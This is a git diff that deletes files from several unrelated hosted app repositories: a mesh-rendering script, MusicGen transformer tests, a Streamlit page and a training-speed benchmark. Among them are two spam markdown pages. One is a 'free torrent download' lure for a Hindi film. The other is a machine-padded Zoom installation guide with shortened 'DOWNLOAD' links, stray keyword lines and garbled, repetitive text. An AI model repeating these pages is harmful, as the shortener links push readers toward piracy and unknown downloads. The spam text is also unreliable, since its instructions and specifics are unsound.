- sh2 = x[0] - sh3 = -x[3] - sh4 = -x[1] - - r2x = R[0][0] + R[0][1] - r2y = R[1][0] + R[1][1] - r2z = R[2][0] + R[2][1] - - r3x = R[0][0] + R[0][2] - r3y = R[1][0] + R[1][2] - r3z = R[2][0] + R[2][2] - - r4x = R[0][1] + R[0][2] - r4y = R[1][1] + R[1][2] - r4z = R[2][1] + R[2][2] - - sh0_x = sh0 * R[0][0] - sh0_y = sh0 * R[1][0] - d0 = sh0_x * R[1][0] - d1 = sh0_y * R[2][0] - d2 = sh0 * (R[2][0] * R[2][0] + s_c4_div_c3) - d3 = sh0_x * R[2][0] - d4 = sh0_x * R[0][0] - sh0_y * R[1][0] - - sh1_x = sh1 * R[0][2] - sh1_y = sh1 * R[1][2] - d0 += sh1_x * R[1][2] - d1 += sh1_y * R[2][2] - d2 += sh1 * (R[2][2] * R[2][2] + s_c4_div_c3) - d3 += sh1_x * R[2][2] - d4 += sh1_x * R[0][2] - sh1_y * R[1][2] - - sh2_x = sh2 * r2x - sh2_y = sh2 * r2y - d0 += sh2_x * r2y - d1 += sh2_y * r2z - d2 += sh2 * (r2z * r2z + s_c4_div_c3_x2) - d3 += sh2_x * r2z - d4 += sh2_x * r2x - sh2_y * r2y - - sh3_x = sh3 * r3x - sh3_y = sh3 * r3y - d0 += sh3_x * r3y - d1 += sh3_y * r3z - d2 += sh3 * (r3z * r3z + s_c4_div_c3_x2) - d3 += sh3_x * r3z - d4 += sh3_x * r3x - sh3_y * r3y - - sh4_x = sh4 * r4x - sh4_y = sh4 * r4y - d0 += sh4_x * r4y - d1 += sh4_y * r4z - d2 += sh4 * (r4z * r4z + s_c4_div_c3_x2) - d3 += sh4_x * r4z - d4 += sh4_x * r4x - sh4_y * r4y - - dst = x - dst[0] = d0 - dst[1] = -d1 - dst[2] = d2 * s_scale_dst2 - dst[3] = -d3 - dst[4] = d4 * s_scale_dst4 - - return dst - -def render_prt_ortho(out_path, folder_name, subject_name, shs, rndr, rndr_uv, im_size, angl_step=4, n_light=1, pitch=[0]): - cam = Camera(width=im_size, height=im_size) - cam.ortho_ratio = 0.4 * (512 / im_size) - cam.near = -100 - cam.far = 100 - cam.sanity_check() - - # set path for obj, prt - mesh_file = os.path.join(folder_name, subject_name + '_100k.obj') - if not os.path.exists(mesh_file): - print('ERROR: obj file does not exist!!', mesh_file) - return - prt_file = os.path.join(folder_name, 'bounce', 'bounce0.txt') - if not os.path.exists(prt_file): - print('ERROR: prt file does not exist!!!', prt_file) - return - face_prt_file = os.path.join(folder_name, 'bounce', 'face.npy') - if not os.path.exists(face_prt_file): - print('ERROR: face prt file does not exist!!!', prt_file) - return - text_file = os.path.join(folder_name, 'tex', subject_name + '_dif_2k.jpg') - if not os.path.exists(text_file): - print('ERROR: dif file does not exist!!', text_file) - return - - texture_image = cv2.imread(text_file) - texture_image = cv2.cvtColor(texture_image, cv2.COLOR_BGR2RGB) - - vertices, faces, normals, faces_normals, textures, face_textures = load_obj_mesh(mesh_file, with_normal=True, with_texture=True) - vmin = vertices.min(0) - vmax = vertices.max(0) - up_axis = 1 if (vmax-vmin).argmax() == 1 else 2 - - vmed = np.median(vertices, 0) - vmed[up_axis] = 0.5*(vmax[up_axis]+vmin[up_axis]) - y_scale = 180/(vmax[up_axis] - vmin[up_axis]) - - rndr.set_norm_mat(y_scale, vmed) - rndr_uv.set_norm_mat(y_scale, vmed) - - tan, bitan = compute_tangent(vertices, faces, normals, textures, face_textures) - prt = np.loadtxt(prt_file) - face_prt = np.load(face_prt_file) - rndr.set_mesh(vertices, faces, normals, faces_normals, textures, face_textures, prt, face_prt, tan, bitan) - rndr.set_albedo(texture_image) - - rndr_uv.set_mesh(vertices, faces, normals, faces_normals, textures, face_textures, prt, face_prt, tan, bitan) - rndr_uv.set_albedo(texture_image) - - os.makedirs(os.path.join(out_path, 'GEO', 'OBJ', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'PARAM', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'RENDER', 
subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'MASK', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_RENDER', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_MASK', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_POS', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_NORMAL', subject_name),exist_ok=True) - - if not os.path.exists(os.path.join(out_path, 'val.txt')): - f = open(os.path.join(out_path, 'val.txt'), 'w') - f.close() - - # copy obj file - cmd = 'cp %s %s' % (mesh_file, os.path.join(out_path, 'GEO', 'OBJ', subject_name)) - print(cmd) - os.system(cmd) - - for p in pitch: - for y in tqdm(range(0, 360, angl_step)): - R = np.matmul(make_rotate(math.radians(p), 0, 0), make_rotate(0, math.radians(y), 0)) - if up_axis == 2: - R = np.matmul(R, make_rotate(math.radians(90),0,0)) - - rndr.rot_matrix = R - rndr_uv.rot_matrix = R - rndr.set_camera(cam) - rndr_uv.set_camera(cam) - - for j in range(n_light): - sh_id = random.randint(0,shs.shape[0]-1) - sh = shs[sh_id] - sh_angle = 0.2*np.pi*(random.random()-0.5) - sh = rotateSH(sh, make_rotate(0, sh_angle, 0).T) - - dic = {'sh': sh, 'ortho_ratio': cam.ortho_ratio, 'scale': y_scale, 'center': vmed, 'R': R} - - rndr.set_sh(sh) - rndr.analytic = False - rndr.use_inverse_depth = False - rndr.display() - - out_all_f = rndr.get_color(0) - out_mask = out_all_f[:,:,3] - out_all_f = cv2.cvtColor(out_all_f, cv2.COLOR_RGBA2BGR) - - np.save(os.path.join(out_path, 'PARAM', subject_name, '%d_%d_%02d.npy'%(y,p,j)),dic) - cv2.imwrite(os.path.join(out_path, 'RENDER', subject_name, '%d_%d_%02d.jpg'%(y,p,j)),255.0*out_all_f) - cv2.imwrite(os.path.join(out_path, 'MASK', subject_name, '%d_%d_%02d.png'%(y,p,j)),255.0*out_mask) - - rndr_uv.set_sh(sh) - rndr_uv.analytic = False - rndr_uv.use_inverse_depth = False - rndr_uv.display() - - uv_color = rndr_uv.get_color(0) - uv_color = cv2.cvtColor(uv_color, cv2.COLOR_RGBA2BGR) - cv2.imwrite(os.path.join(out_path, 'UV_RENDER', subject_name, '%d_%d_%02d.jpg'%(y,p,j)),255.0*uv_color) - - if y == 0 and j == 0 and p == pitch[0]: - uv_pos = rndr_uv.get_color(1) - uv_mask = uv_pos[:,:,3] - cv2.imwrite(os.path.join(out_path, 'UV_MASK', subject_name, '00.png'),255.0*uv_mask) - - data = {'default': uv_pos[:,:,:3]} # default is a reserved name - pyexr.write(os.path.join(out_path, 'UV_POS', subject_name, '00.exr'), data) - - uv_nml = rndr_uv.get_color(2) - uv_nml = cv2.cvtColor(uv_nml, cv2.COLOR_RGBA2BGR) - cv2.imwrite(os.path.join(out_path, 'UV_NORMAL', subject_name, '00.png'),255.0*uv_nml) - - -if __name__ == '__main__': - shs = np.load('./env_sh.npy') - - parser = argparse.ArgumentParser() - parser.add_argument('-i', '--input', type=str, default='/home/shunsuke/Downloads/rp_dennis_posed_004_OBJ') - parser.add_argument('-o', '--out_dir', type=str, default='/home/shunsuke/Documents/hf_human') - parser.add_argument('-m', '--ms_rate', type=int, default=1, help='higher ms rate results in less aliased output. MESA renderer only supports ms_rate=1.') - parser.add_argument('-e', '--egl', action='store_true', help='egl rendering option. use this when rendering with headless server with NVIDIA GPU') - parser.add_argument('-s', '--size', type=int, default=512, help='rendering image size') - args = parser.parse_args() - - # NOTE: GL context has to be created before any other OpenGL function loads. 
- from lib.renderer.gl.init_gl import initialize_GL_context - initialize_GL_context(width=args.size, height=args.size, egl=args.egl) - - from lib.renderer.gl.prt_render import PRTRender - rndr = PRTRender(width=args.size, height=args.size, ms_rate=args.ms_rate, egl=args.egl) - rndr_uv = PRTRender(width=args.size, height=args.size, uv_mode=True, egl=args.egl) - - if args.input[-1] == '/': - args.input = args.input[:-1] - subject_name = args.input.split('/')[-1][:-4] - render_prt_ortho(args.out_dir, args.input, subject_name, shs, rndr, rndr_uv, args.size, 1, 1, pitch=[0]) \ No newline at end of file diff --git a/spaces/facebook/MusicGen/tests/modules/test_transformer.py b/spaces/facebook/MusicGen/tests/modules/test_transformer.py deleted file mode 100644 index ee74ba06614bd8dafd204ecc84e8fb74527cee69..0000000000000000000000000000000000000000 --- a/spaces/facebook/MusicGen/tests/modules/test_transformer.py +++ /dev/null @@ -1,253 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from itertools import product - -import pytest -import torch - -from audiocraft.modules.transformer import ( - StreamingMultiheadAttention, StreamingTransformer, set_efficient_attention_backend) - - -def test_transformer_causal_streaming(): - torch.manual_seed(1234) - - for context, custom in product([None, 10], [False, True]): - # Test that causality and receptive fields are properly handled. - # looking at the gradients - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=custom, - dropout=0.) - steps = 20 - for k in [0, 10, 15, 19]: - x = torch.randn(4, steps, 16, requires_grad=True) - y = tr(x) - y[:, k].abs().sum().backward() - if k + 1 < steps: - assert torch.allclose(x.grad[:, k + 1:], torch.tensor(0.)), x.grad[:, k + 1:].norm() - assert not torch.allclose(x.grad[:, :k + 1], torch.tensor(0.)), x.grad[:, :k + 1].norm() - if context is not None and k > context: - limit = k - context - 1 - assert torch.allclose(x.grad[:, :limit], - torch.tensor(0.)), x.grad[:, :limit].norm() - - # Now check that streaming gives the same result at batch eval. - x = torch.randn(4, steps, 16) - y = tr(x) - ys = [] - with tr.streaming(): - for k in range(steps): - chunk = x[:, k:k + 1, :] - ys.append(tr(chunk)) - y_stream = torch.cat(ys, dim=1) - delta = torch.norm(y_stream - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_transformer_vs_pytorch(): - torch.manual_seed(1234) - # Check that in the non causal setting, we get the same result as - # PyTorch Transformer encoder. - for custom in [False, True]: - tr = StreamingTransformer( - 16, 4, 2, - causal=False, custom=custom, dropout=0., positional_scale=0.) - layer = torch.nn.TransformerEncoderLayer(16, 4, dropout=0., batch_first=True) - tr_ref = torch.nn.TransformerEncoder(layer, 2) - tr.load_state_dict(tr_ref.state_dict()) - - x = torch.randn(4, 20, 16) - y = tr(x) - y2 = tr_ref(x) - delta = torch.norm(y2 - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_streaming_api(): - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0.) 
- tr.eval() - steps = 12 - x = torch.randn(1, steps, 16) - - with torch.no_grad(): - with tr.streaming(): - _ = tr(x[:, :1]) - state = {k: v.clone() for k, v in tr.get_streaming_state().items()} - y = tr(x[:, 1:2]) - tr.set_streaming_state(state) - y2 = tr(x[:, 1:2]) - assert torch.allclose(y, y2), (y - y2).norm() - assert tr.flush() is None - - -def test_memory_efficient(): - for backend in ['torch']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1) - tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - assert torch.allclose(y, y2), ((y - y2).norm(), backend) - - -def test_attention_as_float32(): - torch.manual_seed(1234) - cases = [ - {'custom': True}, - {'custom': False}, - ] - for case in cases: - tr = StreamingTransformer(16, 4, 2, dropout=0., dtype=torch.bfloat16, **case) - tr_float32 = StreamingTransformer( - 16, 4, 2, dropout=0., attention_as_float32=True, dtype=torch.bfloat16, **case) - if not case['custom']: - # we are not using autocast here because it doesn't really - # work as expected on CPU, so we have to manually cast the weights of the MHA. - for layer in tr_float32.layers: - layer.self_attn.mha.to(torch.float32) - tr_float32.load_state_dict(tr.state_dict()) - steps = 12 - x = torch.randn(3, steps, 16, dtype=torch.bfloat16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_float32(x) - assert not torch.allclose(y, y2), (y - y2).norm() - - -@torch.no_grad() -def test_streaming_memory_efficient(): - for backend in ['torch']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0., custom=True) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, causal=True) - tr.load_state_dict(tr_mem_efficient.state_dict()) - tr.eval() - tr_mem_efficient.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr_mem_efficient.streaming(): - outs = [] - # frame_sizes = [2] + [1] * (steps - 2) - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr_mem_efficient(frame)) - - out = torch.cat(outs, dim=1) - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_cross_attention(): - torch.manual_seed(1234) - for norm_first in [True, False]: - m = StreamingTransformer( - 16, 4, 2, cross_attention=False, norm_first=norm_first, dropout=0., custom=True) - m_cross = StreamingTransformer( - 16, 4, 2, cross_attention=True, norm_first=norm_first, dropout=0., custom=True) - m_cross.load_state_dict(m.state_dict(), strict=False) - x = torch.randn(2, 5, 16) - cross_x = torch.randn(2, 3, 16) - y_ref = m(x) - y_cross_zero = m_cross(x, cross_attention_src=0 * cross_x) - # With norm_first, the two should be exactly the same, - # but with norm_first=False, we get 2 normalization in a row - # and the epsilon value leads to a tiny change. - atol = 0. if norm_first else 1e-6 - print((y_ref - y_cross_zero).norm() / y_ref.norm()) - assert torch.allclose(y_ref, y_cross_zero, atol=atol) - - # We now expect a difference even with a generous atol of 1e-2. 
- y_cross = m_cross(x, cross_attention_src=cross_x) - assert not torch.allclose(y_cross, y_cross_zero, atol=1e-2) - - with pytest.raises(AssertionError): - _ = m_cross(x) - _ = m(x, cross_attention_src=cross_x) - - -def test_cross_attention_compat(): - torch.manual_seed(1234) - num_heads = 2 - dim = num_heads * 64 - with pytest.raises(AssertionError): - StreamingMultiheadAttention(dim, num_heads, causal=True, cross_attention=True) - - cross_attn = StreamingMultiheadAttention( - dim, num_heads, dropout=0, cross_attention=True, custom=True) - ref_attn = torch.nn.MultiheadAttention(dim, num_heads, dropout=0, batch_first=True) - - # We can load the regular attention state dict - # so we have compat when loading old checkpoints. - cross_attn.load_state_dict(ref_attn.state_dict()) - - queries = torch.randn(3, 7, dim) - keys = torch.randn(3, 9, dim) - values = torch.randn(3, 9, dim) - - y = cross_attn(queries, keys, values)[0] - y_ref = ref_attn(queries, keys, values)[0] - assert torch.allclose(y, y_ref, atol=1e-7), (y - y_ref).norm() / y_ref.norm() - - # Now let's check that streaming is working properly. - with cross_attn.streaming(): - ys = [] - for step in range(queries.shape[1]): - ys.append(cross_attn(queries[:, step: step + 1], keys, values)[0]) - y_streaming = torch.cat(ys, dim=1) - assert torch.allclose(y_streaming, y, atol=1e-7) - - -def test_repeat_kv(): - torch.manual_seed(1234) - num_heads = 8 - kv_repeat = 4 - dim = num_heads * 64 - with pytest.raises(AssertionError): - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, cross_attention=True) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, custom=True) - x = torch.randn(4, 18, dim) - y = mha(x, x, x)[0] - assert x.shape == y.shape - - -def test_qk_layer_norm(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, bias_attn=False) - steps = 12 - x = torch.randn(3, steps, 16) - y = tr(x) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, cross_attention=True) - z = torch.randn(3, 21, 16) - y = tr(x, cross_attention_src=z) - assert y.shape == x.shape diff --git a/spaces/falterWliame/Face_Mask_Detection/Mr. X 3 Hindi Movie Torrent Free Download Hd BEST.md b/spaces/falterWliame/Face_Mask_Detection/Mr. X 3 Hindi Movie Torrent Free Download Hd BEST.md deleted file mode 100644 index 692631c1f4cd62ea4b76a62e4548d8f924bdd1cb..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Mr. X 3 Hindi Movie Torrent Free Download Hd BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Mr. X 3 hindi movie torrent free download hd


Download: https://urlca.com/2uDe1A



      -
      -
      -

      diff --git a/spaces/fatiXbelha/sd/Download Zoom for Mac Zoom The Most Reliable and User-Friendly Video Conferencing App.md b/spaces/fatiXbelha/sd/Download Zoom for Mac Zoom The Most Reliable and User-Friendly Video Conferencing App.md deleted file mode 100644 index 36b806251a69640acabc2615a46a6207cc5010ed..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Download Zoom for Mac Zoom The Most Reliable and User-Friendly Video Conferencing App.md +++ /dev/null @@ -1,115 +0,0 @@ -
      -

      How to Download Zoom for Macbook Pro 2021

      -

      Zoom is one of the most popular and reliable video conferencing platforms in the world. It allows you to host or join online meetings, webinars, classes, events, and more with ease and efficiency. Whether you need to communicate with your colleagues, clients, friends, or family, Zoom can help you stay connected and productive.

      -

      If you have a Macbook Pro 2021, you might be wondering how to download and use Zoom on your device. In this article, we will show you how to do that in simple steps. We will also share some tips and tricks for optimizing your Zoom experience on your Macbook Pro 2021.

      -

      download zoom for macbook pro 2021


DOWNLOAD: https://urllie.com/2uNDDf



      -

      What You Need to Download Zoom for Macbook Pro 2021

      -

      Before you download Zoom for your Macbook Pro 2021, you need to make sure that your device meets the minimum requirements and specifications for running the app. Here are some of the things you need:

      -
        -
      • A Macbook Pro 2021 with macOS Big Sur (11.0) or later
      • -
      • An internet connection with at least 2 Mbps of bandwidth
      • -
      • A webcam, microphone, and speakers (built-in or external)
      • -
      • A valid email address (for creating a Zoom account)
      • -
      • A credit card or PayPal account (for purchasing a paid Zoom plan)
      • -
      -
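If you want to double-check the requirements above before installing, macOS ships with commands that report them directly. This is a minimal sketch using standard built-in tools; the expected values in the comments are only illustrative, and `networkQuality` is only present on macOS Monterey (12) and later.

```shell
# Report the installed macOS version (the app expects 11.0 "Big Sur" or newer)
sw_vers -productVersion

# Report the CPU architecture (arm64 on the 2021 MacBook Pro, x86_64 on older Intel models)
uname -m

# Rough bandwidth check; available on macOS 12 and later only
networkQuality
```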

      How to Create a Zoom Account

      -

      To host or join a Zoom meeting, you need to have a Zoom account. You can create a free or paid account depending on your needs and preferences. Here are the steps to create a Zoom account:

      -
        -
      1. Go to https://zoom.us/ and click on "Sign up, it's free" at the top right corner of the page.
      2. -
      3. Enter your date of birth and click on "Continue".
      4. -
      5. Enter your email address or sign in with your SSO, Google, or Facebook account.
      6. -
      7. Check your email inbox and click on the confirmation link sent by Zoom.
      8. -
      9. Follow the instructions to complete your profile and choose your plan.
      10. -
      -

You can also create a Zoom account from within the app after you download it: the app's sign-in screen includes a sign-up option that walks you through the same steps.

      -

      How to Download and Install the Zoom App for Macbook Pro 2021

      -

      There are two ways to download and install the Zoom app for your Macbook Pro 2021: from the official website or from the App Store. Here are the steps for both methods:

      -

      From the official website

      -
        -
      1. Go to https://zoom.us/download and click on "Download" under "Zoom Client for Meetings".
      2. -
      3. Double-click on the downloaded file (Zoom.pkg) and follow the instructions to install the app.
      4. -
      5. If prompted, enter your administrator credentials and allow Zoom to access your microphone and camera.
      6. -
      7. Launch the app and sign in with your Zoom account or create a new one.
      8. -
      -
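If you are comfortable in Terminal, the same client can also be installed with the Homebrew package manager instead of the manual download. This is only a sketch: it assumes Homebrew is already installed and that the client is published under the cask name `zoom`.

```shell
# Install the Zoom desktop client as a Homebrew cask
brew install --cask zoom

# Keep it up to date later alongside your other casks
brew upgrade --cask zoom
```

Either route should leave you with the same app in your Applications folder, so pick whichever fits your workflow.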

      From the App Store

      -
        -
      1. Open the App Store on your Macbook Pro 2021 and search for "Zoom" in the search bar.
      2. -
      3. Click on "Get" or "Install" next to the app icon and enter your Apple ID and password if prompted.
      4. -
      5. Wait for the app to download and install on your device.
      6. -
      7. Launch the app and sign in with your Zoom account or create a new one.
      8. -
      -

      How to Host or Join a Zoom Meeting on Macbook Pro 2021

      -

      Once you have the Zoom app installed on your Macbook Pro 2021, you can host or join a Zoom meeting with ease. Here are the steps for both scenarios:

      -

      How to host a Zoom meeting

      -
        -
      1. Launch the Zoom app and sign in with your Zoom account.
      2. -
      3. Click on "New Meeting" at the top left corner of the app window.
      4. -
      5. Select your preferred options for video, audio, and personal meeting ID.
      6. -
      7. Click on "Start Meeting" to begin your meeting.
      8. -
      9. Invite participants by clicking on "Invite" at the bottom of the meeting window and choosing your preferred method (email, contacts, copy URL, etc.).
      10. -
      11. Manage your meeting by using the controls at the bottom of the meeting window, such as mute/unmute, stop/start video, share screen, chat, record, etc.
      12. -
      13. End your meeting by clicking on "End Meeting" at the bottom right corner of the meeting window and choosing "End Meeting for All".
      14. -
      -

      How to join a Zoom meeting

      -
        -
      1. Launch the Zoom app and sign in with your Zoom account.
      2. -
      3. Click on "Join" at the top right corner of the app window.
      4. -
      5. Enter the meeting ID or link and your display name.
      6. -
      7. Select your preferred options for video and audio.
      8. -
      9. Click on "Join" to enter the meeting.
      10. -
      11. Participate in the meeting by using the controls at the bottom of the meeting window, such as mute/unmute, stop/start video, raise hand, chat, etc.
      12. -
      13. Leave the meeting by clicking on "Leave Meeting" at the bottom right corner of the meeting window and choosing "Leave Meeting".
      14. -
      -
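Zoom invitation links follow a predictable pattern, which means you can join a meeting straight from a link in an email, a calendar entry, or even Terminal without going through the app's Join dialog. The meeting ID below is a placeholder rather than a real meeting:

```shell
# Join links have the form https://zoom.us/j/<meeting-id> (optionally with ?pwd=<passcode>)
# `open` hands the URL to macOS, which launches the Zoom app if it is installed
open "https://zoom.us/j/1234567890"
```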

      Tips and Tricks for Using Zoom on Macbook Pro 2021

      -

      To make the most out of your Zoom experience on your Macbook Pro 2021, here are some tips and tricks that you can try:

      -


      -
        -
      • Adjust your settings: You can customize your Zoom settings by clicking on the gear icon at the top right corner of the app window. You can change your preferences for video, audio, recording, keyboard shortcuts, accessibility, and more.
      • -
      • Use keyboard shortcuts: You can use keyboard shortcuts to quickly perform common actions in Zoom, such as mute/unmute, start/stop video, share screen, etc. You can find a list of keyboard shortcuts by clicking on "Keyboard Shortcuts" under "Settings". You can also create your own custom shortcuts if you want.
      • -
      • Record your meetings: You can record your Zoom meetings for future reference or sharing by clicking on "Record" at the bottom of the meeting window. You can choose to record locally on your device or in the cloud (if you have a paid plan). You can access your recordings by clicking on "Meetings" at the top of the app window and then on "Recorded".
      • -
      • Use virtual backgrounds: You can change your background in Zoom to hide your real environment or add some fun to your meetings. You can choose from a variety of preset backgrounds or upload your own images or videos. To use virtual backgrounds, click on "Virtual Background" under "Settings" and select or upload your desired background.
      • -
      • Use breakout rooms: You can split your Zoom meeting into smaller groups for more focused discussions or activities. You can create up to 50 breakout rooms and assign participants manually or automatically. To use breakout rooms, click on "Breakout Rooms" at the bottom of the meeting window and follow the instructions.
      • -
      -
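A note on the recording tip above: when you record locally, Zoom writes the video and audio files to a folder on disk once the meeting ends. The path below is the usual default on macOS; if you changed the location in the app's Recording settings, adjust it accordingly.

```shell
# List locally saved Zoom recordings (default location on macOS)
ls ~/Documents/Zoom
```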

      Conclusion

      -

In this article, we have shown you how to download and use Zoom on your Macbook Pro 2021. We hope that this guide has helped you set up and enjoy Zoom on your device. Zoom is a great tool for video conferencing that can help you communicate and collaborate with anyone, anywhere, anytime. Whether you need it for work, school, or staying in touch with friends and family, the steps above should have you meeting online in just a few minutes.

      -
      -
      \ No newline at end of file diff --git a/spaces/fatimahhussain/workoutwizard/home.py b/spaces/fatimahhussain/workoutwizard/home.py deleted file mode 100644 index 62cecfbd703f8cd50a584d4a3671829cc8d8a2b5..0000000000000000000000000000000000000000 --- a/spaces/fatimahhussain/workoutwizard/home.py +++ /dev/null @@ -1,33 +0,0 @@ -import logging - -import streamlit as st - -logger = logging.getLogger() - -st.title("streamlit-webrtc demo!") -st.info( - """👈 Select the demo -""" -) - - -if __name__ == "__main__": - import os - - DEBUG = os.environ.get("DEBUG", "false").lower() not in ["false", "no", "0"] - - logging.basicConfig( - format="[%(asctime)s] %(levelname)7s from %(name)s in %(pathname)s:%(lineno)d: " - "%(message)s", - level=logging.DEBUG if DEBUG else logging.INFO, - force=True, - ) - - fsevents_logger = logging.getLogger("fsevents") - fsevents_logger.setLevel(logging.WARNING) - - aiortc_logger = logging.getLogger("aiortc") - aiortc_logger.setLevel(logging.INFO) - - aioice_logger = logging.getLogger("aioice") - aioice_logger.setLevel(logging.INFO) diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/docs/speed_benchmark.md b/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/docs/speed_benchmark.md deleted file mode 100644 index 055aee0defe2c43a523ced48260242f0f99b7cea..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/docs/speed_benchmark.md +++ /dev/null @@ -1,93 +0,0 @@ -## Test Training Speed - -- Test Commands - -You need to use the following two commands to test the Partial FC training performance. -The number of identites is **3 millions** (synthetic data), turn mixed precision training on, backbone is resnet50, -batch size is 1024. 
-```shell -# Model Parallel -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions -# Partial FC 0.1 -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions_pfc -``` - -- GPU Memory - -``` -# (Model Parallel) gpustat -i -[0] Tesla V100-SXM2-32GB | 64'C, 94 % | 30338 / 32510 MB -[1] Tesla V100-SXM2-32GB | 60'C, 99 % | 28876 / 32510 MB -[2] Tesla V100-SXM2-32GB | 60'C, 99 % | 28872 / 32510 MB -[3] Tesla V100-SXM2-32GB | 69'C, 99 % | 28872 / 32510 MB -[4] Tesla V100-SXM2-32GB | 66'C, 99 % | 28888 / 32510 MB -[5] Tesla V100-SXM2-32GB | 60'C, 99 % | 28932 / 32510 MB -[6] Tesla V100-SXM2-32GB | 68'C, 100 % | 28916 / 32510 MB -[7] Tesla V100-SXM2-32GB | 65'C, 99 % | 28860 / 32510 MB - -# (Partial FC 0.1) gpustat -i -[0] Tesla V100-SXM2-32GB | 60'C, 95 % | 10488 / 32510 MB │······················· -[1] Tesla V100-SXM2-32GB | 60'C, 97 % | 10344 / 32510 MB │······················· -[2] Tesla V100-SXM2-32GB | 61'C, 95 % | 10340 / 32510 MB │······················· -[3] Tesla V100-SXM2-32GB | 66'C, 95 % | 10340 / 32510 MB │······················· -[4] Tesla V100-SXM2-32GB | 65'C, 94 % | 10356 / 32510 MB │······················· -[5] Tesla V100-SXM2-32GB | 61'C, 95 % | 10400 / 32510 MB │······················· -[6] Tesla V100-SXM2-32GB | 68'C, 96 % | 10384 / 32510 MB │······················· -[7] Tesla V100-SXM2-32GB | 64'C, 95 % | 10328 / 32510 MB │······················· -``` - -- Training Speed - -```python -# (Model Parallel) trainging.log -Training: Speed 2271.33 samples/sec Loss 1.1624 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 2269.94 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 2272.67 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 2266.55 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 2272.54 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 - -# (Partial FC 0.1) trainging.log -Training: Speed 5299.56 samples/sec Loss 1.0965 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 5296.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 5304.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 5274.43 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 5300.10 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 -``` - -In this test case, Partial FC 0.1 only use1 1/3 of the GPU memory of the model parallel, -and the training speed is 2.5 times faster than the model parallel. - - -## Speed Benchmark - -1. Training speed of different parallel methods (samples/second), Tesla V100 32GB * 8. (Larger is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 4681 | 4824 | 5004 | -|250000 | 4047 | 4521 | 4976 | -|500000 | 3087 | 4013 | 4900 | -|1000000 | 2090 | 3449 | 4803 | -|1400000 | 1672 | 3043 | 4738 | -|2000000 | - | 2593 | 4626 | -|4000000 | - | 1748 | 4208 | -|5500000 | - | 1389 | 3975 | -|8000000 | - | - | 3565 | -|16000000 | - | - | 2679 | -|29000000 | - | - | 1855 | - -2. GPU memory cost of different parallel methods (GB per GPU), Tesla V100 32GB * 8. 
